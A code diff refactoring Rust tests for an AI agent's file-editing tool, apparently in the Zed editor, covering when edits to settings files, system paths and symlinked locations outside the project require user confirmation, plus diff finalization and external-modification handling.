ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "test 1".into(), - path: ".zed/settings.json".into(), - mode: EditFileMode::Edit, - }, + &PathBuf::from(".zed/settings.json"), + "test 1", &stream_tx, cx, ) @@ -1158,17 +2591,8 @@ mod tests { // Test 2: Path outside project should require confirmation let (stream_tx, mut stream_rx) 
= ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "test 2".into(), - path: "/etc/hosts".into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 2", &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!(event.tool_call.fields.title, Some("test 2".into())); @@ -1176,15 +2600,7 @@ mod tests { // Test 3: Relative path without .zed should not require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "test 3".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) + tool.authorize(&PathBuf::from("root/src/main.rs"), "test 3", &stream_tx, cx) }) .await .unwrap(); @@ -1194,11 +2610,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "test 4".into(), - path: "root/.zed/tasks.json".into(), - mode: EditFileMode::Edit, - }, + &PathBuf::from("root/.zed/tasks.json"), + "test 4", &stream_tx, cx, ) @@ -1221,11 +2634,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "test 5.1".into(), - path: ".zed/settings.json".into(), - mode: EditFileMode::Edit, - }, + &PathBuf::from(".zed/settings.json"), + "test 5.1", &stream_tx, cx, ) @@ -1238,30 +2648,17 @@ mod tests { // 5.2: /etc/hosts is outside the project, but Allow auto-approves let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "test 5.2".into(), - path: "/etc/hosts".into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }) - .await - .unwrap(); + 
cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.2", &stream_tx, cx)) + .await + .unwrap(); assert!(stream_rx.try_recv().is_err()); // 5.3: Normal in-project path with allow — no confirmation needed let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "test 5.3".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Edit, - }, + &PathBuf::from("root/src/main.rs"), + "test 5.3", &stream_tx, cx, ) @@ -1278,24 +2675,15 @@ mod tests { }); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "test 5.4".into(), - path: "/etc/hosts".into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + let _auth = cx + .update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.4", &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!(event.tool_call.fields.title, Some("test 5.4".into())); } #[gpui::test] - async fn test_authorize_create_under_symlink_with_allow(cx: &mut TestAppContext) { + async fn test_streaming_authorize_create_under_symlink_with_allow(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -1303,28 +2691,8 @@ mod tests { fs.insert_tree("/outside", json!({})).await; fs.insert_symlink("/root/link", PathBuf::from("/outside")) .await; - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = 
Arc::new(EditFileTool::new( - project, - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; cx.update(|cx| { let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); @@ -1335,11 +2703,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let authorize_task = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "create through symlink".into(), - path: "link/new.txt".into(), - mode: EditFileMode::Create, - }, + &PathBuf::from("link/new.txt"), + "create through symlink", &stream_tx, cx, ) @@ -1367,7 +2732,9 @@ mod tests { } #[gpui::test] - async fn test_edit_file_symlink_escape_requests_authorization(cx: &mut TestAppContext) { + async fn test_streaming_edit_file_symlink_escape_requests_authorization( + cx: &mut TestAppContext, + ) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -1391,39 +2758,14 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _authorize_task = cx.update(|cx| { tool.authorize( - 
&EditFileToolInput { - display_description: "edit through symlink".into(), - path: PathBuf::from("link_to_external/config.txt"), - mode: EditFileMode::Edit, - }, + &PathBuf::from("link_to_external/config.txt"), + "edit through symlink", &stream_tx, cx, ) @@ -1438,7 +2780,7 @@ mod tests { } #[gpui::test] - async fn test_edit_file_symlink_escape_denied(cx: &mut TestAppContext) { + async fn test_streaming_edit_file_symlink_escape_denied(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -1462,39 +2804,14 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let authorize_task = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "edit through symlink".into(), - path: PathBuf::from("link_to_external/config.txt"), - mode: EditFileMode::Edit, - }, + &PathBuf::from("link_to_external/config.txt"), + "edit through symlink", &stream_tx, cx, ) @@ -1508,7 +2825,7 @@ mod tests { } #[gpui::test] - async fn test_edit_file_symlink_escape_honors_deny_policy(cx: &mut TestAppContext) { + async fn test_streaming_edit_file_symlink_escape_honors_deny_policy(cx: &mut 
TestAppContext) { init_test(cx); cx.update(|cx| { let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); @@ -1543,40 +2860,15 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let result = cx .update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "edit through symlink".into(), - path: PathBuf::from("link_to_external/config.txt"), - mode: EditFileMode::Edit, - }, + &PathBuf::from("link_to_external/config.txt"), + "edit through symlink", &stream_tx, cx, ) @@ -1594,33 +2886,13 @@ mod tests { } #[gpui::test] - async fn test_authorize_global_config(cx: &mut TestAppContext) { + async fn test_streaming_authorize_global_config(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/project", json!({})).await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = 
Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - // Test global config paths - these should require confirmation if they exist and are outside the project let test_cases = vec![ ( "/etc/hosts", @@ -1641,17 +2913,8 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: path.into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + let auth = + cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); if should_confirm { stream_rx.expect_authorization().await; @@ -1668,11 +2931,9 @@ mod tests { } #[gpui::test] - async fn test_needs_confirmation_with_multiple_worktrees(cx: &mut TestAppContext) { + async fn test_streaming_needs_confirmation_with_multiple_worktrees(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); - - // Create multiple worktree directories fs.insert_tree( "/workspace/frontend", json!({ @@ -1700,40 +2961,17 @@ mod tests { }), ) .await; - - // Create project with multiple worktrees - let project = Project::test( - fs.clone(), - [ + let (tool, _project, _action_log, _fs, _thread) = setup_test_with_fs( + cx, + fs, + &[ path!("/workspace/frontend").as_ref(), path!("/workspace/backend").as_ref(), path!("/workspace/shared").as_ref(), ], - cx, ) .await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let 
context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); - // Test files in different worktrees let test_cases = vec![ ("frontend/src/main.js", false, "File in first worktree"), ("backend/src/main.rs", false, "File in second worktree"), @@ -1747,22 +2985,13 @@ mod tests { "../outside/file.txt", true, "Relative path outside worktrees", - ), - ]; - - for (path, should_confirm, description) in test_cases { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: path.into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + ), + ]; + + for (path, should_confirm, description) in test_cases { + let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); + let auth = + cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); if should_confirm { stream_rx.expect_authorization().await; @@ -1779,7 +3008,7 @@ mod tests { } #[gpui::test] - async fn test_needs_confirmation_edge_cases(cx: &mut TestAppContext) { + async fn test_streaming_needs_confirmation_edge_cases(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree( @@ -1796,35 +3025,12 @@ mod tests { }), ) .await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| 
ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - // Test edge cases let test_cases = vec![ - // Empty path - find_project_path returns Some for empty paths ("", false, "Empty path is treated as project root"), - // Root directory ("/", true, "Root directory should be outside project"), - // Parent directory references - find_project_path resolves these ( "project/../other", true, @@ -1835,7 +3041,6 @@ mod tests { false, "Path with . should work normally", ), - // Windows-style paths (if on Windows) #[cfg(target_os = "windows")] ("C:\\Windows\\System32\\hosts", true, "Windows system path"), #[cfg(target_os = "windows")] @@ -1844,17 +3049,8 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: path.into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + let auth = + cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); cx.run_until_parked(); @@ -1873,7 +3069,7 @@ mod tests { } #[gpui::test] - async fn test_needs_confirmation_with_different_modes(cx: &mut TestAppContext) { + async fn test_streaming_needs_confirmation_with_different_modes(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree( @@ -1886,45 +3082,18 @@ mod tests { }), ) .await; - let project = 
Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - // Test different EditFileMode values - let modes = vec![ - EditFileMode::Edit, - EditFileMode::Create, - EditFileMode::Overwrite, - ]; + let modes = vec![EditFileMode::Edit, EditFileMode::Write]; - for mode in modes { + for _mode in modes { // Test .zed path with different modes let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "Edit settings".into(), - path: "project/.zed/settings.json".into(), - mode: mode.clone(), - }, + &PathBuf::from("project/.zed/settings.json"), + "Edit settings", &stream_tx, cx, ) @@ -1936,11 +3105,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: "/outside/file.txt".into(), - mode: mode.clone(), - }, + &PathBuf::from("/outside/file.txt"), + "Edit file", &stream_tx, cx, ) @@ -1952,11 +3118,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: "project/normal.txt".into(), - mode: mode.clone(), - 
}, + &PathBuf::from("project/normal.txt"), + "Edit file", &stream_tx, cx, ) @@ -1968,40 +3131,19 @@ mod tests { } #[gpui::test] - async fn test_initial_title_with_partial_input(cx: &mut TestAppContext) { + async fn test_streaming_initial_title_with_partial_input(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project, - thread.downgrade(), - language_registry, - Templates::new(), - )); + fs.insert_tree("/project", json!({})).await; + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; cx.update(|cx| { - // ... 
assert_eq!( tool.initial_title( Err(json!({ "path": "src/main.rs", "display_description": "", - "old_string": "old code", - "new_string": "new code" })), cx ), @@ -2012,8 +3154,6 @@ mod tests { Err(json!({ "path": "", "display_description": "Fix error handling", - "old_string": "old code", - "new_string": "new code" })), cx ), @@ -2024,8 +3164,6 @@ mod tests { Err(json!({ "path": "src/main.rs", "display_description": "Fix error handling", - "old_string": "old code", - "new_string": "new code" })), cx ), @@ -2036,8 +3174,6 @@ mod tests { Err(json!({ "path": "", "display_description": "", - "old_string": "old code", - "new_string": "new code" })), cx ), @@ -2051,42 +3187,25 @@ mod tests { } #[gpui::test] - async fn test_diff_finalization(cx: &mut TestAppContext) { + async fn test_streaming_diff_finalization(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/", json!({"main.rs": ""})).await; - - let project = Project::test(fs.clone(), [path!("/").as_ref()], cx).await; - let languages = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); + let (tool, project, action_log, _fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/").as_ref()]).await; + let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); // Ensure the diff is finalized after the edit completes. 
{ - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - languages.clone(), - Templates::new(), - )); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let edit = cx.update(|cx| { - tool.run( + tool.clone().run( ToolInput::resolved(EditFileToolInput { display_description: "Edit file".into(), path: path!("/main.rs").into(), - mode: EditFileMode::Edit, + mode: EditFileMode::Write, + content: Some("new content".into()), + edits: None, }), stream_tx, cx, @@ -2096,47 +3215,17 @@ mod tests { let diff = stream_rx.expect_diff().await; diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Pending(_)))); cx.run_until_parked(); - model.end_last_completion_stream(); edit.await.unwrap(); diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); } - // Ensure the diff is finalized if an error occurs while editing. - { - model.forbid_requests(); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - languages.clone(), - Templates::new(), - )); - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let edit = cx.update(|cx| { - tool.run( - ToolInput::resolved(EditFileToolInput { - display_description: "Edit file".into(), - path: path!("/main.rs").into(), - mode: EditFileMode::Edit, - }), - stream_tx, - cx, - ) - }); - stream_rx.expect_update_fields().await; - let diff = stream_rx.expect_diff().await; - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Pending(_)))); - edit.await.unwrap_err(); - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); - model.allow_requests(); - } - // Ensure the diff is finalized if the tool call gets dropped. 
{ let tool = Arc::new(EditFileTool::new( project.clone(), thread.downgrade(), - languages.clone(), - Templates::new(), + action_log, + language_registry, )); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let edit = cx.update(|cx| { @@ -2144,7 +3233,9 @@ mod tests { ToolInput::resolved(EditFileToolInput { display_description: "Edit file".into(), path: path!("/main.rs").into(), - mode: EditFileMode::Edit, + mode: EditFileMode::Write, + content: Some("dropped content".into()), + edits: None, }), stream_tx, cx, @@ -2160,49 +3251,16 @@ mod tests { } #[gpui::test] - async fn test_file_read_times_tracking(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - - // Initially, file_read_times should be empty - let is_empty = action_log.read_with(cx, |action_log, _| { - action_log - .file_read_time(path!("/root/test.txt").as_ref()) - .is_none() - }); - assert!(is_empty, "file_read_times should start empty"); - - // Create read tool + async fn test_streaming_consecutive_edits_work(cx: &mut TestAppContext) { + let (tool, project, action_log, _fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( project.clone(), action_log.clone(), true, )); - // Read the file to record the read time + // Read the file first cx.update(|cx| { 
read_tool.clone().run( ToolInput::resolved(crate::ReadFileToolInput { @@ -2217,84 +3275,65 @@ mod tests { .await .unwrap(); - // Verify that file_read_times now contains an entry for the file - let has_entry = action_log.read_with(cx, |log, _| { - log.file_read_time(path!("/root/test.txt").as_ref()) - .is_some() - }); + // First edit should work + let edit_result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "First edit".into(), + path: "root/test.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "original content".into(), + new_text: "modified content".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; assert!( - has_entry, - "file_read_times should contain an entry after reading the file" + edit_result.is_ok(), + "First edit should succeed, got error: {:?}", + edit_result.as_ref().err() ); - // Read the file again - should update the entry - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - // Should still have an entry after re-reading - let has_entry = action_log.read_with(cx, |log, _| { - log.file_read_time(path!("/root/test.txt").as_ref()) - .is_some() - }); + // Second edit should also work because the edit updated the recorded read time + let edit_result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Second edit".into(), + path: "root/test.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "modified content".into(), + new_text: "further modified content".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; assert!( - has_entry, - "file_read_times should still have an entry after re-reading" + 
edit_result.is_ok(), + "Second consecutive edit should succeed, got error: {:?}", + edit_result.as_ref().err() ); } - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - }); - } - #[gpui::test] - async fn test_consecutive_edits_work(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - - let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); - let edit_tool = Arc::new(EditFileTool::new( + async fn test_streaming_external_modification_matching_edit_succeeds(cx: &mut TestAppContext) { + let (tool, project, action_log, fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; + let read_tool = Arc::new(crate::ReadFileTool::new( project.clone(), - thread.downgrade(), - languages, - Templates::new(), + action_log.clone(), + true, )); // Read the file first @@ -2312,102 +3351,79 @@ mod tests { .await .unwrap(); - // First edit should work - let edit_result = { - let edit_task = cx.update(|cx| { - edit_tool.clone().run( - ToolInput::resolved(EditFileToolInput { - display_description: "First edit".into(), - path: "root/test.txt".into(), - mode: EditFileMode::Edit, - }), - 
ToolCallEventStream::test().0, - cx, - ) - }); - - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk( - "original contentmodified content" - .to_string(), - ); - model.end_last_completion_stream(); + // Simulate external modification + cx.background_executor + .advance_clock(std::time::Duration::from_secs(2)); + fs.save( + path!("/root/test.txt").as_ref(), + &"externally modified content".into(), + language::LineEnding::Unix, + ) + .await + .unwrap(); - edit_task.await - }; - assert!( - edit_result.is_ok(), - "First edit should succeed, got error: {:?}", - edit_result.as_ref().err() - ); + // Reload the buffer to pick up the new mtime + let project_path = project + .read_with(cx, |project, cx| { + project.find_project_path("root/test.txt", cx) + }) + .expect("Should find project path"); + let buffer = project + .update(cx, |project, cx| project.open_buffer(project_path, cx)) + .await + .unwrap(); + buffer + .update(cx, |buffer, cx| buffer.reload(cx)) + .await + .unwrap(); - // Second edit should also work because the edit updated the recorded read time - let edit_result = { - let edit_task = cx.update(|cx| { - edit_tool.clone().run( + cx.executor().run_until_parked(); + + let result = cx + .update(|cx| { + tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Second edit".into(), + display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "externally modified content".into(), + new_text: "new content".into(), + }]), }), ToolCallEventStream::test().0, cx, ) - }); - - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk( - "modified contentfurther modified content".to_string(), - ); - model.end_last_completion_stream(); + }) + .await + .unwrap(); - edit_task.await + let EditFileToolOutput::Success { + new_text, + input_path, + .. 
+ } = result + else { + panic!("expected success"); }; - assert!( - edit_result.is_ok(), - "Second consecutive edit should succeed, got error: {:?}", - edit_result.as_ref().err() - ); + + assert_eq!(new_text, "new content"); + assert_eq!(input_path, PathBuf::from("root/test.txt")); } #[gpui::test] - async fn test_external_modification_detected(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - - let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); - let edit_tool = Arc::new(EditFileTool::new( + async fn test_streaming_external_modification_mentioned_when_match_fails( + cx: &mut TestAppContext, + ) { + let (tool, project, action_log, fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; + let read_tool = Arc::new(crate::ReadFileTool::new( project.clone(), - thread.downgrade(), - languages, - Templates::new(), + action_log.clone(), + true, )); - // Read the file first cx.update(|cx| { read_tool.clone().run( ToolInput::resolved(crate::ReadFileToolInput { @@ -2422,7 +3438,6 @@ mod tests { .await .unwrap(); - // Simulate external modification - advance time and save file cx.background_executor .advance_clock(std::time::Duration::from_secs(2)); fs.save( @@ -2433,7 +3448,6 @@ mod 
tests { .await .unwrap(); - // Reload the buffer to pick up the new mtime let project_path = project .read_with(cx, |project, cx| { project.find_project_path("root/test.txt", cx) @@ -2450,14 +3464,18 @@ mod tests { cx.executor().run_until_parked(); - // Try to edit - should fail because file was modified externally let result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(EditFileToolInput { display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "original content".into(), + new_text: "new content".into(), + }]), }), ToolCallEventStream::test().0, cx, @@ -2465,53 +3483,35 @@ mod tests { }) .await; + let EditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { + panic!("expected error"); + }; + assert!( - result.is_err(), - "Edit should fail after external modification" + error.contains("Could not find matching text for edit at index 0"), + "Error should mention failed match, got: {error}" ); - let error_msg = result.unwrap_err().to_string(); 